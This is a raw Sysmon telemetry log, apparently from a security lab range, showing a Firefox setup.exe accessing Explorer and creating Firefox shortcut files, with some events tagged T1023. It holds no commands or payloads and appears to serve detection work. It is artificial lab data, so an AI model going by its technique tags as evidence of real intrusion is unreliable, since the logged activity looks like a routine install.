13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7ee(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+12c7(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+15ac(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7de(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+12c7(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+15ac(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7de(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+12c7(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+15ac(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7de(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+12c7(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+15ac(wow64) 10341000x800000000000000016376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7de(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+12c7(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+15ac(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 11241100x800000000000000016375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Users\Public\Desktop\Firefox.lnk2021-01-18 13:59:53.396 10341000x800000000000000016374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7ee(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+2228|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7ee(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+2228|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7ee(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+2228|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7ee(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+2228|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7de(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+2228|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7de(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+2228|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7de(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+2228|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7de(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+2228|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 11241100x800000000000000016366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Users\Public\Desktop\Firefox.lnk2021-01-18 13:59:53.396 11241100x800000000000000016365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT10232021-01-18 13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk~RF17d9a6.TMP2021-01-18 13:59:53.396 11241100x800000000000000016364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT10232021-01-18 
13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\ProgramData\Microsoft\Windows\Start Menu\Programs\~irefox.tmp2021-01-18 13:59:53.396 11241100x800000000000000016363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ApplicationID.dll2021-01-18 13:59:53.380 10341000x800000000000000016362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7ee(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+12c7(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+15ac(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7ee(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+12c7(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+15ac(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7ee(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+12c7(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+15ac(wow64) 10341000x800000000000000016359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7ee(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+12c7(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+15ac(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
